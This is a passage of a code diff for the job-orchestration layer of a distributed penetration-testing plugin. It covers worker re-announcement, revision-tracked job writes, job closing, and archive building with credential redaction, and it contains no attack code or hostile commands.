""" + Launcher-only reconciliation pass for unseen or stale assigned workers. + + This phase only performs bounded per-worker re-announcement by bumping the + worker-specific assignment revision. Explicit terminal failure after retry + exhaustion is handled separately. 
+ """ + now = self.time() + if now - self._last_worker_reconcile_check <= self.cfg_check_jobs_each: + return + self._last_worker_reconcile_check = now + + all_jobs = PentesterApi01Plugin._get_job_state_repository(self).list_jobs() or {} + live_payloads = PentesterApi01Plugin._get_job_state_repository(self).list_live_progress() or {} + + for job_key, raw_job_specs in all_jobs.items(): + normalized_key, job_specs = self._normalize_job_record(job_key, raw_job_specs, migrate=True) + if normalized_key is None or not isinstance(job_specs, dict): + continue + if job_specs.get("job_cid"): + continue + if job_specs.get("launcher") != self.ee_addr: + continue + if is_terminal_job_status(job_specs.get("job_status")): + continue + + reconciled_workers = reconcile_job_workers(self, job_specs, live_payloads=live_payloads, now=now) + if not reconciled_workers: + continue + + distributed_cfg = get_distributed_job_reconciliation_config(self) + startup_timeout = distributed_cfg["STARTUP_TIMEOUT"] + stale_grace = distributed_cfg["STALE_GRACE"] + max_retries = distributed_cfg["MAX_REANNOUNCE_ATTEMPTS"] + job_changed = False + stop_job = False + + for worker_addr, worker_state in reconciled_workers.items(): + if worker_state.get("finished"): + continue + + worker_status = worker_state.get("worker_state") + if worker_status not in {"unseen", "stale"}: + continue + + reannounce_count = int(worker_state.get("reannounce_count", 0) or 0) + assigned_at = worker_state.get("assigned_at") or job_specs.get("date_created") or now + last_reannounce_at = worker_state.get("last_reannounce_at") + elapsed_since_trigger = now - float(last_reannounce_at or assigned_at) + retry_reason = None + + if worker_status == "unseen" and elapsed_since_trigger >= startup_timeout: + retry_reason = "startup_timeout" + elif worker_status == "stale": + last_seen_at = worker_state.get("last_seen_at") or worker_state.get("updated_at") or assigned_at + if now - float(last_seen_at) >= stale_grace and elapsed_since_trigger 
>= stale_grace: + retry_reason = "stale_live" + + if not retry_reason: + continue + + target_worker = (job_specs.get("workers") or {}).get(worker_addr) + if not isinstance(target_worker, dict): + continue + + if reannounce_count >= max_retries: + target_worker["terminal_reason"] = "unreachable" + target_worker["error"] = ( + f"Worker {worker_addr} did not acknowledge assignment after " + f"{reannounce_count} re-announcements ({retry_reason})" + ) + target_worker["unreachable_at"] = now + target_worker["retry_reason"] = retry_reason + set_job_status(job_specs, JOB_STATUS_STOPPED) + PentesterApi01Plugin._emit_timeline_event( + self, + job_specs, + "worker_unreachable", + f"Worker {worker_addr} unreachable after retries", + meta={ + "worker_addr": worker_addr, + "retry_reason": retry_reason, + "reannounce_count": reannounce_count, + }, + ) + PentesterApi01Plugin._emit_timeline_event( + self, + job_specs, + "stopped", + f"Job stopped: assigned worker {worker_addr} unreachable", + ) + self.P( + "[CSTORE] Stopping job due to unreachable worker " + f"job_id={normalized_key} worker={worker_addr} " + f"reason={retry_reason} retries={reannounce_count}", + color='r', + ) + self._log_audit_event("worker_assignment_exhausted", { + "job_id": normalized_key, + "worker_addr": worker_addr, + "retry_reason": retry_reason, + "reannounce_count": reannounce_count, + }) + job_changed = True + stop_job = True + break + + current_revision = PentesterApi01Plugin._get_worker_assignment_revision(target_worker) + target_worker["assignment_revision"] = current_revision + 1 + target_worker["reannounce_count"] = reannounce_count + 1 + target_worker["last_reannounce_at"] = now + target_worker["retry_reason"] = retry_reason + target_worker.setdefault("assigned_at", assigned_at) + job_changed = True + + PentesterApi01Plugin._emit_timeline_event( + self, + job_specs, + "worker_reannounced", + f"Worker {worker_addr} assignment re-announced", + meta={ + "worker_addr": worker_addr, + "retry_reason": 
retry_reason, + "old_revision": current_revision, + "new_revision": target_worker["assignment_revision"], + "reannounce_count": target_worker["reannounce_count"], + }, + ) + + self.P( + "[CSTORE] Re-announcing worker assignment " + f"job_id={normalized_key} worker={worker_addr} " + f"old_rev={current_revision} new_rev={target_worker['assignment_revision']} " + f"reason={retry_reason} retries={target_worker['reannounce_count']}", + color='y', + ) + self._log_audit_event("worker_assignment_reannounced", { + "job_id": normalized_key, + "worker_addr": worker_addr, + "old_revision": current_revision, + "new_revision": target_worker["assignment_revision"], + "retry_reason": retry_reason, + "reannounce_count": target_worker["reannounce_count"], + }) + + if job_changed: + context = "worker_unreachable_stop" if stop_job else "worker_reannounce" + PentesterApi01Plugin._write_job_record(self, normalized_key, job_specs, context=context) + + def _get_job_revision(self, job_specs): + """Return a normalized revision for mutable CStore job records.""" + if not isinstance(job_specs, dict): + return 0 + try: + return int(job_specs.get("job_revision", 0) or 0) + except (TypeError, ValueError): + return 0 + + def _supports_guarded_job_writes(self): + """ + Return whether mutable RedMesh job writes have real guarded-write semantics. + + The current chainstore API only exposes plain hget/hset primitives, so + RedMesh cannot claim compare-and-swap or optimistic concurrency guarantees. + """ + return False + + def _get_job_write_guarantees(self): + """Describe the actual guarantees of mutable RedMesh job-state writes.""" + return { + "mode": "detection_only", + "guarded_writes": False, + "stale_write_detection": True, + "job_revision": True, + } + + def _write_job_record(self, job_id, job_specs, expected_revision=None, context=""): + """ + Persist mutable job state with revision bump and stale-write detection. + + This is observability only; it does not provide compare-and-swap semantics. 
+ """ + current = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) + current_revision = PentesterApi01Plugin._get_job_revision(self, current) + incoming_revision = PentesterApi01Plugin._get_job_revision(self, job_specs) + if expected_revision is None: + expected_revision = incoming_revision + + if isinstance(current, dict) and current_revision != expected_revision: + self.P( + f"[CSTORE] Stale write detected for job {job_id}: " + f"expected_revision={expected_revision}, current_revision={current_revision}, context={context or 'unspecified'}", + color='y' + ) + self._log_audit_event("stale_write_detected", { + "job_id": job_id, + "expected_revision": expected_revision, + "current_revision": current_revision, + "context": context or "", + "write_mode": PentesterApi01Plugin._get_job_write_guarantees(self)["mode"], + }) + + persisted = job_specs if isinstance(job_specs, dict) else dict(job_specs) + persisted["job_revision"] = current_revision + 1 + normalized = PentesterApi01Plugin._get_job_state_repository(self).put_job(job_id, persisted) + if isinstance(job_specs, dict) and isinstance(normalized, dict) and normalized is not job_specs: + job_specs.clear() + job_specs.update(normalized) + return job_specs + return normalized + + def _delete_job_record(self, job_id): + """Delete a job record from CStore.""" + PentesterApi01Plugin._get_job_state_repository(self).delete_job(job_id) return @@ -1162,37 +1195,57 @@ def _close_job(self, job_id, canceled=False): total_scanned = 0 total_ports = 0 all_open = set() + scan_type = "network" for w in local_workers_pre.values(): total_scanned += len(w.state.get("ports_scanned", [])) total_ports += len(w.initial_ports) all_open.update(w.state.get("open_ports", [])) - job_specs_pre = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + if w.state.get("scan_type") == "webapp": + scan_type = "webapp" + job_specs_pre = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) pass_nr = 
job_specs_pre.get("job_pass", 1) if isinstance(job_specs_pre, dict) else 1 + worker_entry_pre = {} + if isinstance(job_specs_pre, dict): + worker_entry_pre = (job_specs_pre.get("workers") or {}).get(self.ee_addr) or {} + assignment_revision = PentesterApi01Plugin._get_worker_assignment_revision(worker_entry_pre) + live_meta = getattr(self, "_execution_live_meta", {}).get(job_id, {}) + started_at = live_meta.get("started_at", self.time()) + first_seen_live_at = live_meta.get("first_seen_live_at", started_at) + total_phases = 5 done_progress = WorkerProgress( job_id=job_id, worker_addr=self.ee_addr, pass_nr=pass_nr, + assignment_revision_seen=assignment_revision, progress=100.0, phase="done", + scan_type=scan_type, + phase_index=total_phases, + total_phases=total_phases, ports_scanned=total_scanned, ports_total=total_ports, open_ports_found=sorted(all_open), completed_tests=[], updated_at=self.time(), + started_at=started_at, + first_seen_live_at=first_seen_live_at, + last_seen_at=self.time(), + finished=True, ) - self.chainstore_hset( - hkey=f"{self.cfg_instance_id}:live", - key=f"{job_id}:{self.ee_addr}", - value=done_progress.to_dict(), - ) + PentesterApi01Plugin._get_job_state_repository(self).put_live_progress_model(done_progress) local_workers = self.scan_jobs.pop(job_id, None) + self._forget_execution_identity(job_id) if local_workers: + # Resolve worker class for aggregation field registry + first_worker = next(iter(local_workers.values()), None) + worker_cls = type(first_worker) if first_worker else None + local_reports = { local_worker_id: local_worker.get_status() for local_worker_id, local_worker in local_workers.items() } - report = self._get_aggregated_report(local_reports) + report = self._get_aggregated_report(local_reports, worker_cls=worker_cls) if report: # Replace generically-merged scan_metrics with properly summed metrics thread_metrics = [r.get("scan_metrics") for r in local_reports.values() if r.get("scan_metrics")] @@ -1217,7 +1270,7 @@ def 
_close_job(self, job_id, canceled=False): thread_scan_metrics[lwid] = entry if thread_scan_metrics: report["thread_scan_metrics"] = thread_scan_metrics - raw_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + raw_job_specs = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) if raw_job_specs is None: self.P(f"Job {job_id} no longer present in chainstore; skipping close sync.", color='r') return @@ -1261,7 +1314,7 @@ def _close_job(self, job_id, canceled=False): worker_entry["result"] = report # Re-read job_specs to avoid overwriting concurrent updates (e.g., pass_reports) - fresh_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + fresh_job_specs = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) if fresh_job_specs and isinstance(fresh_job_specs, dict): fresh_job_specs["workers"][self.ee_addr] = worker_entry job_specs = fresh_job_specs @@ -1271,15 +1324,10 @@ def _close_job(self, job_id, canceled=False): job_id, self.json_dumps(job_specs, indent=2) )) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="close_job") # Audit: scan completed - nr_findings = 0 - for port_data in report.get("service_info", {}).values(): - if isinstance(port_data, dict): - for method_data in port_data.values(): - if isinstance(method_data, dict): - nr_findings += len(method_data.get("findings", [])) + nr_findings = self._count_all_findings(report) self._log_audit_event("scan_completed", { "job_id": job_id, "target": job_specs.get("target"), @@ -1310,7 +1358,7 @@ def _maybe_stop_canceled_jobs(self): return for job_id in list(self.scan_jobs): - raw = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + raw = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) if not raw: continue _, job_specs = self._normalize_job_record(job_id, raw) @@ -1334,7 +1382,7 @@ def _maybe_close_jobs(self): 
all_workers_done = True any_canceled_worker = False reports = {} - job : PentestLocalWorker = None + job = None initiator = None nr_local_workers = len(local_workers) for local_worker_id, job in local_workers.items(): @@ -1376,393 +1424,36 @@ def _maybe_close_jobs(self): return - def _compute_risk_score(self, aggregated_report): - """ - Compute a 0-100 risk score from an aggregated scan report. + def _build_job_archive(self, job_key, job_specs): + """Build archive, write to R1FS, prune CStore. Idempotent on failure. - The score combines four components: - A. Finding severity (weighted by confidence) - B. Open ports (diminishing returns) - C. Attack surface breadth (distinct protocols) - D. Default credentials penalty + Called when job reaches FINALIZED or STOPPED state. Builds the complete + archive, writes it to R1FS, then prunes CStore to a lightweight stub. + + Safety invariant: never prune CStore until archive CID is confirmed written. Parameters ---------- - aggregated_report : dict - Aggregated report with service_info, web_tests_info, correlation_findings, - open_ports, and port_protocols. - - Returns - ------- - dict - ``{"score": int, "breakdown": dict}`` + job_key : str + CStore key for this job. + job_specs : dict + Full CStore job state. 
""" - import math - - findings_score = 0.0 - finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} - cred_count = 0 - - def process_findings(findings_list): - nonlocal findings_score, cred_count - for finding in findings_list: - if not isinstance(finding, dict): - continue - severity = finding.get("severity", "INFO").upper() - confidence = finding.get("confidence", "firm").lower() - weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) - multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) - findings_score += weight * multiplier - if severity in finding_counts: - finding_counts[severity] += 1 - title = finding.get("title", "") - if isinstance(title, str) and "default credential accepted" in title.lower(): - cred_count += 1 - - # A. Iterate service_info findings - service_info = aggregated_report.get("service_info", {}) - for port_key, probes in service_info.items(): - if not isinstance(probes, dict): - continue - for probe_name, probe_data in probes.items(): - if not isinstance(probe_data, dict): - continue - process_findings(probe_data.get("findings", [])) - - # A. Iterate web_tests_info findings - web_tests_info = aggregated_report.get("web_tests_info", {}) - for port_key, tests in web_tests_info.items(): - if not isinstance(tests, dict): - continue - for test_name, test_data in tests.items(): - if not isinstance(test_data, dict): - continue - process_findings(test_data.get("findings", [])) + job_id = job_specs.get("job_id", job_key) - # A. Iterate correlation_findings - correlation_findings = aggregated_report.get("correlation_findings", []) - if isinstance(correlation_findings, list): - process_findings(correlation_findings) - - # B. Open ports — diminishing returns: 15 × (1 - e^(-ports/8)) - open_ports = aggregated_report.get("open_ports", []) - nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 - open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) - - # C. 
Attack surface breadth — distinct protocols: 10 × (1 - e^(-protocols/4)) - port_protocols = aggregated_report.get("port_protocols", {}) - nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 - breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) - - # D. Default credentials penalty - credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) - - # Raw total - raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty - - # Normalize to 0-100 via logistic curve - score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) - score = max(0, min(100, score)) - - return { - "score": score, - "breakdown": { - "findings_score": round(findings_score, 1), - "open_ports_score": round(open_ports_score, 1), - "breadth_score": round(breadth_score, 1), - "credentials_penalty": credentials_penalty, - "raw_total": round(raw_total, 1), - "finding_counts": finding_counts, - }, - } - - def _compute_risk_and_findings(self, aggregated_report): - """ - Compute risk score AND extract flat findings in a single walk. - - Extends _compute_risk_score to also produce a flat list of enriched - findings from the nested service_info/web_tests_info/correlation structure. - - Parameters - ---------- - aggregated_report : dict - Aggregated report with service_info, web_tests_info, etc. - - Returns - ------- - tuple[dict, list] - (risk_result, flat_findings) where risk_result is {"score": int, "breakdown": dict} - and flat_findings is a list of enriched finding dicts. 
- """ - import hashlib - import math - - findings_score = 0.0 - finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} - cred_count = 0 - flat_findings = [] - - port_protocols = aggregated_report.get("port_protocols") or {} - - def process_findings(findings_list, port, probe_name, category): - nonlocal findings_score, cred_count - for finding in findings_list: - if not isinstance(finding, dict): - continue - severity = finding.get("severity", "INFO").upper() - confidence = finding.get("confidence", "firm").lower() - weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) - multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) - findings_score += weight * multiplier - if severity in finding_counts: - finding_counts[severity] += 1 - title = finding.get("title", "") - if isinstance(title, str) and "default credential accepted" in title.lower(): - cred_count += 1 - - # Build deterministic finding_id - canon_title = (finding.get("title") or "").lower().strip() - cwe = finding.get("cwe_id", "") - id_input = f"{port}:{probe_name}:{cwe}:{canon_title}" - finding_id = hashlib.sha256(id_input.encode()).hexdigest()[:16] - - protocol = port_protocols.get(str(port), "unknown") - - flat_findings.append({ - "finding_id": finding_id, - **{k: v for k, v in finding.items()}, - "port": port, - "protocol": protocol, - "probe": probe_name, - "category": category, - }) - - def parse_port(port_key): - """Extract integer port from keys like '80/tcp' or '80'.""" - try: - return int(str(port_key).split("/")[0]) - except (ValueError, IndexError): - return 0 - - # Walk service_info - service_info = aggregated_report.get("service_info", {}) - for port_key, probes in service_info.items(): - if not isinstance(probes, dict): - continue - port = parse_port(port_key) - for probe_name, probe_data in probes.items(): - if not isinstance(probe_data, dict): - continue - process_findings(probe_data.get("findings", []), port, probe_name, "service") - - # Walk web_tests_info - 
web_tests_info = aggregated_report.get("web_tests_info", {}) - for port_key, tests in web_tests_info.items(): - if not isinstance(tests, dict): - continue - port = parse_port(port_key) - for test_name, test_data in tests.items(): - if not isinstance(test_data, dict): - continue - process_findings(test_data.get("findings", []), port, test_name, "web") - - # Walk correlation_findings - correlation_findings = aggregated_report.get("correlation_findings", []) - if isinstance(correlation_findings, list): - process_findings(correlation_findings, 0, "_correlation", "correlation") - - # B. Open ports — diminishing returns - open_ports = aggregated_report.get("open_ports", []) - nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 - open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) - - # C. Attack surface breadth - nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 - breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) - - # D. Default credentials penalty - credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) - - # Deduplicate CVE findings: when the same CVE appears on the same port - # from different probes (behavioral + version-based), keep the higher - # confidence detection and drop the duplicate. 
- import re as _re_dedup - CONFIDENCE_RANK = {"certain": 3, "firm": 2, "tentative": 1} - cve_best = {} # (cve_id, port) -> index of best finding - drop_indices = set() - for idx, f in enumerate(flat_findings): - title = f.get("title", "") - m = _re_dedup.search(r"CVE-\d{4}-\d+", title) - if not m: - continue - cve_id = m.group(0) - port = f.get("port", 0) - key = (cve_id, port) - conf = CONFIDENCE_RANK.get(f.get("confidence", "tentative"), 0) - if key in cve_best: - prev_idx = cve_best[key] - prev_conf = CONFIDENCE_RANK.get(flat_findings[prev_idx].get("confidence", "tentative"), 0) - if conf > prev_conf: - drop_indices.add(prev_idx) - cve_best[key] = idx - else: - drop_indices.add(idx) - else: - cve_best[key] = idx - - if drop_indices: - flat_findings = [f for i, f in enumerate(flat_findings) if i not in drop_indices] - # Recalculate scores after dedup - findings_score = 0.0 - finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} - cred_count = 0 - for f in flat_findings: - severity = f.get("severity", "INFO").upper() - confidence = f.get("confidence", "firm").lower() - weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) - multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) - findings_score += weight * multiplier - if severity in finding_counts: - finding_counts[severity] += 1 - title = f.get("title", "") - if isinstance(title, str) and "default credential accepted" in title.lower(): - cred_count += 1 - credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) - - raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty - score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) - score = max(0, min(100, score)) - - risk_result = { - "score": score, - "breakdown": { - "findings_score": round(findings_score, 1), - "open_ports_score": round(open_ports_score, 1), - "breadth_score": round(breadth_score, 1), - "credentials_penalty": credentials_penalty, - 
"raw_total": round(raw_total, 1), - "finding_counts": finding_counts, - }, - } - return risk_result, flat_findings - - def _count_services(self, service_info): - """Count ports that have at least one identified service. - - Parameters - ---------- - service_info : dict - Port-keyed service info dict from aggregated scan data. - - Returns - ------- - int - Number of ports with detected services. - """ - if not isinstance(service_info, dict): - return 0 - count = 0 - for port_key, probes in service_info.items(): - if isinstance(probes, dict) and len(probes) > 0: - count += 1 - return count - - SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} - CONFIDENCE_ORDER = {"certain": 0, "firm": 1, "tentative": 2} - - def _compute_ui_aggregate(self, passes, latest_aggregated): - """Compute pre-aggregated view for frontend from pass reports. - - Parameters - ---------- - passes : list - List of pass report dicts (PassReport.to_dict()). - latest_aggregated : dict - AggregatedScanData dict for the latest pass. 
- - Returns - ------- - UiAggregate - """ - from collections import Counter - - latest = passes[-1] - agg = latest_aggregated - findings = latest.get("findings", []) or [] - - # Severity breakdown - findings_count = dict(Counter(f.get("severity", "INFO") for f in findings)) - - # Top findings: CRITICAL + HIGH, sorted by severity then confidence, capped at 10 - crit_high = [f for f in findings if f.get("severity") in ("CRITICAL", "HIGH")] - crit_high.sort(key=lambda f: ( - self.SEVERITY_ORDER.get(f.get("severity"), 9), - self.CONFIDENCE_ORDER.get(f.get("confidence"), 9), - )) - top_findings = crit_high[:10] - - # Finding timeline: track persistence across passes (continuous monitoring) - finding_timeline = {} - for p in passes: - pass_nr = p.get("pass_nr", 0) - for f in (p.get("findings") or []): - fid = f.get("finding_id") - if not fid: - continue - if fid not in finding_timeline: - finding_timeline[fid] = {"first_seen": pass_nr, "last_seen": pass_nr, "pass_count": 1} - else: - finding_timeline[fid]["last_seen"] = pass_nr - finding_timeline[fid]["pass_count"] += 1 - - return UiAggregate( - total_open_ports=sorted(set(agg.get("open_ports", []))), - total_services=self._count_services(agg.get("service_info", {})), - total_findings=len(findings), - findings_count=findings_count if findings_count else None, - top_findings=top_findings if top_findings else None, - finding_timeline=finding_timeline if finding_timeline else None, - latest_risk_score=latest.get("risk_score"), - latest_risk_breakdown=latest.get("risk_breakdown"), - latest_quick_summary=latest.get("quick_summary"), - worker_activity=[ - { - "id": addr, - "start_port": w["start_port"], - "end_port": w["end_port"], - "open_ports": w.get("open_ports", []), - } - for addr, w in (latest.get("worker_reports") or {}).items() - ] or None, - ) - - def _build_job_archive(self, job_key, job_specs): - """Build archive, write to R1FS, prune CStore. Idempotent on failure. 
- - Called when job reaches FINALIZED or STOPPED state. Builds the complete - archive, writes it to R1FS, then prunes CStore to a lightweight stub. - - Safety invariant: never prune CStore until archive CID is confirmed written. - - Parameters - ---------- - job_key : str - CStore key for this job. - job_specs : dict - Full CStore job state. - """ - job_id = job_specs.get("job_id", job_key) - - # 1. Fetch job config - job_config = self.r1fs.get_json(job_specs.get("job_config_cid")) - if job_config is None: - self.P(f"Cannot build archive for {job_id}: job config not found in R1FS", color='r') - return + # 1. Fetch job config and redact credentials for archive storage + artifacts = PentesterApi01Plugin._get_artifact_repository(self) + job_config = artifacts.get_job_config(job_specs) + if job_config is None: + self.P(f"Cannot build archive for {job_id}: job config not found in R1FS", color='r') + return + if job_config.get("redact_credentials", True): + job_config = self._redact_job_config(job_config) # 2. Fetch all pass reports passes = [] for ref in job_specs.get("pass_reports", []): - pass_data = self.r1fs.get_json(ref["report_cid"]) + pass_data = artifacts.get_pass_report(ref["report_cid"]) if pass_data is None: self.P(f"Cannot build archive for {job_id}: pass {ref['pass_nr']} not found", color='r') return @@ -1774,19 +1465,20 @@ def _build_job_archive(self, job_key, job_specs): # 3. Fetch latest aggregated report for UI aggregate computation latest_agg_cid = passes[-1].get("aggregated_report_cid") - latest_aggregated = self.r1fs.get_json(latest_agg_cid) if latest_agg_cid else None + latest_aggregated = artifacts.get_json(latest_agg_cid) if latest_agg_cid else None if not latest_aggregated: self.P(f"Cannot build archive for {job_id}: latest aggregated report not found in R1FS", color='r') return # 4. 
Compute UI aggregate from passes + latest aggregated data - ui_aggregate = self._compute_ui_aggregate(passes, latest_aggregated) + ui_aggregate = self._compute_ui_aggregate(passes, latest_aggregated, job_config=job_config) # 5. Compose archive date_completed = self.time() duration = date_completed - job_specs.get("date_created", date_completed) archive = JobArchive( + archive_version=JOB_ARCHIVE_VERSION, job_id=job_id, job_config=job_config, timeline=job_specs.get("timeline", []), @@ -1799,13 +1491,22 @@ def _build_job_archive(self, job_key, job_specs): ) # 6. Write archive to R1FS - job_cid = self.r1fs.add_json(archive.to_dict(), show_logs=False) + job_cid = artifacts.put_archive(archive, show_logs=False) if not job_cid: self.P(f"Archive write to R1FS failed for {job_id}", color='r') return # 7. Verify CID is retrievable - if self.r1fs.get_json(job_cid) is None: + from .services.resilience import run_bounded_retry + archive_verify_retries = max(int(getattr(self, "cfg_archive_verify_retries", 1) or 1), 1) + verified_archive = run_bounded_retry( + self, + "archive_verify", + archive_verify_retries, + lambda: artifacts.get_json(job_cid), + is_success=lambda payload: isinstance(payload, dict) and payload.get("job_id") == job_id, + ) + if verified_archive is None: self.P(f"Archive CID {job_cid} not retrievable after write for {job_id}", color='r') return @@ -1814,6 +1515,8 @@ def _build_job_archive(self, job_key, job_specs): job_id=job_id, job_status=job_specs.get("job_status", JOB_STATUS_FINALIZED), target=job_specs.get("target", ""), + scan_type=job_specs.get("scan_type", "network"), + target_url=job_specs.get("target_url", ""), task_name=job_specs.get("task_name", ""), risk_score=job_specs.get("risk_score", 0), run_mode=job_specs.get("run_mode", RUN_MODE_SINGLEPASS), @@ -1829,7 +1532,7 @@ def _build_job_archive(self, job_key, job_specs): job_cid=job_cid, job_config_cid=job_specs.get("job_config_cid", ""), ) - self.chainstore_hset(hkey=self.cfg_instance_id, 
key=job_key, value=stub.to_dict()) + PentesterApi01Plugin._write_job_record(self, job_key, stub.to_dict(), context="archive_prune") self.P(f"Job {job_id} archived. CID={job_cid}, CStore pruned to stub.") # 9. Clean up individual pass report CIDs (best-effort, after commit) @@ -1837,314 +1540,15 @@ def _build_job_archive(self, job_key, job_specs): cid = ref.get("report_cid") if cid: try: - success = self.r1fs.delete_file(cid, show_logs=False, raise_on_error=False) + success = artifacts.delete(cid, show_logs=False, raise_on_error=False) if not success: self.P(f"delete_file returned False for pass report CID {cid}", color='y') except Exception as e: self.P(f"Failed to clean up pass report CID {cid}: {e}", color='y') def _maybe_finalize_pass(self): - """ - Launcher finalizes completed passes and orchestrates continuous monitoring. - - For all jobs, this method: - 1. Detects when all workers have finished the current pass - 2. Records pass completion in pass_reports - - For CONTINUOUS_MONITORING jobs, additionally: - 3. Schedules the next pass after monitor_interval - 4. Resets all workers when it's time to start the next pass - - Only the launcher node executes this logic. 
- - Returns - ------- - None - """ - all_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) - - for job_key, job_specs in all_jobs.items(): - normalized_key, job_specs = self._normalize_job_record(job_key, job_specs) - if normalized_key is None: - continue - - # Only launcher manages pass finalization - is_launcher = job_specs.get("launcher") == self.ee_addr - if not is_launcher: - continue - - workers = job_specs.get("workers", {}) - if not workers: - continue - - run_mode = job_specs.get("run_mode", RUN_MODE_SINGLEPASS) - job_status = job_specs.get("job_status", JOB_STATUS_RUNNING) - all_finished = all(w.get("finished") for w in workers.values()) - next_pass_at = job_specs.get("next_pass_at") - job_pass = job_specs.get("job_pass", 1) - job_id = job_specs.get("job_id") - pass_reports = job_specs.setdefault("pass_reports", []) - - # Skip jobs that are already finalized, stopped, or mid-finalization - if job_status in (JOB_STATUS_FINALIZED, JOB_STATUS_STOPPED): - # Stuck recovery: if no job_cid, the archive build failed previously — retry - # But only if there are pass reports to build from (hard-stopped jobs - # that never completed a pass have nothing to archive) - if not job_specs.get("job_cid") and pass_reports: - self.P(f"[STUCK RECOVERY] {job_id} is {job_status} but has no job_cid — retrying archive build", color='y') - self._build_job_archive(job_id, job_specs) - continue - if job_status in (JOB_STATUS_COLLECTING, JOB_STATUS_ANALYZING, JOB_STATUS_FINALIZING): - continue - - if all_finished and next_pass_at is None: - # ═══════════════════════════════════════════════════ - # STATE: All peers completed current pass - # ═══════════════════════════════════════════════════ - pass_date_started = self._get_timeline_date(job_specs, "pass_started") or self._get_timeline_date(job_specs, "created") - pass_date_completed = self.time() - now_ts = pass_date_completed - - # --- COLLECTING: merge worker reports --- - job_specs["job_status"] = JOB_STATUS_COLLECTING - 
self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - - # 1. AGGREGATE ONCE — fetch node reports from R1FS and merge - node_reports = self._collect_node_reports(workers) - aggregated = self._get_aggregated_report(node_reports) if node_reports else {} - - # 2. RISK SCORE + FLAT FINDINGS (single walk) - risk_score = 0 - flat_findings = [] - risk_result = None - if aggregated: - risk_result, flat_findings = self._compute_risk_and_findings(aggregated) - risk_score = risk_result["score"] - job_specs["risk_score"] = risk_score - self.P(f"Risk score for job {job_id} pass {job_pass}: {risk_score}/100") - - # --- ANALYZING: LLM analysis --- - job_config = self._get_job_config(job_specs) - llm_text = None - summary_text = None - if self.cfg_llm_agent_api_enabled and aggregated: - job_specs["job_status"] = JOB_STATUS_ANALYZING - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - llm_text = self._run_aggregated_llm_analysis(job_id, aggregated, job_config) - summary_text = self._run_quick_summary_analysis(job_id, aggregated, job_config) - - # 4. LLM FAILURE HANDLING - llm_failed = True if (self.cfg_llm_agent_api_enabled and (llm_text is None or summary_text is None)) else None - if llm_failed: - self._emit_timeline_event( - job_specs, "llm_failed", - f"LLM analysis unavailable for pass {job_pass}", - meta={"pass_nr": job_pass} - ) - - # 5. 
BUILD WORKER METADATA from already-fetched node_reports - worker_metas = {} - for addr, report in node_reports.items(): - nr_findings = 0 - for probes in (report.get("service_info") or {}).values(): - if isinstance(probes, dict): - for probe_data in probes.values(): - if isinstance(probe_data, dict): - nr_findings += len(probe_data.get("findings", [])) - for tests in (report.get("web_tests_info") or {}).values(): - if isinstance(tests, dict): - for test_data in tests.values(): - if isinstance(test_data, dict): - nr_findings += len(test_data.get("findings", [])) - nr_findings += len(report.get("correlation_findings") or []) - - worker_metas[addr] = WorkerReportMeta( - report_cid=workers[addr].get("report_cid", ""), - start_port=report.get("start_port", 0), - end_port=report.get("end_port", 0), - ports_scanned=report.get("ports_scanned", 0), - open_ports=report.get("open_ports", []), - nr_findings=nr_findings, - node_ip=report.get("node_ip", ""), - ).to_dict() - - # 6. STORE aggregated report as separate CID - aggregated_report_cid = None - if aggregated: - aggregated_data = AggregatedScanData.from_dict(aggregated).to_dict() - aggregated_report_cid = self.r1fs.add_json(aggregated_data, show_logs=False) - if not aggregated_report_cid: - self.P(f"Failed to store aggregated report for pass {job_pass} in R1FS", color='r') - continue # skip pass finalization, retry next loop - - # 7. 
